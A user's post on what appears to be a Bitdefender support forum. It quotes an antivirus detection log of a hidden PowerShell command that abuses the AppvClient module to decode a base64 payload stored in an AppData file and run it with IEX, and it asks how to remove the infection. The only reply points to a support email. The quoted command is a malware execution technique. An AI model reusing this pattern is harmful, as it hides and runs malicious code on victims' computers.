Protection

Protection

powershell.exe malware. How do I remove it?

Over the last few days bitdefender has found 1 attack each day with the following:
powershell.exe
C:\Windows\ System32\WindowsPowerShell\v1.0
(Command line parameters: "C:\Windows\ System32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -WindowStyle Hidden -ExecutionPolicy RemoteSigned -Command &(env:psmodulepath = [Io.Directory]::GetCurrentDirectory(); import-module AppvClient; Sync -AppvPublishingServer n; [strig]Scontent=[System.Text.Encoding]::UTF8:GetString([System.Convert]::FromBase64String(IO.File]::ReadA||Text(C:Users\Mark Schnegg\AppData\Roaming\logs.txt).Replace('-','')));IEX $content;))
wscript.exe
C:\Windows\System32
conhost
C:\Windows\System32
Disenfection successful: Open quarantine
Any idea what this is? How can I eliminate it?

Thanks
Tagged:

Answers

  • powershell.exe malware. How do I remove it?

    Kindly drop an email to bitdefender support at bitsy@bitdefender.com regarding your query .They will reply back asap.

    Regards

    Flex

    (Bitdefender beta tester 2019/ 2020)

    Life happens, Coffee helps!

    Show your Attitude, when you reach that Altitude!

    Bitdefender Ultimate Security Plus (user)

Welcome!

It looks like you're new here. Sign in or register to get started.

Welcome!

It looks like you're new here. Sign in or register to get started.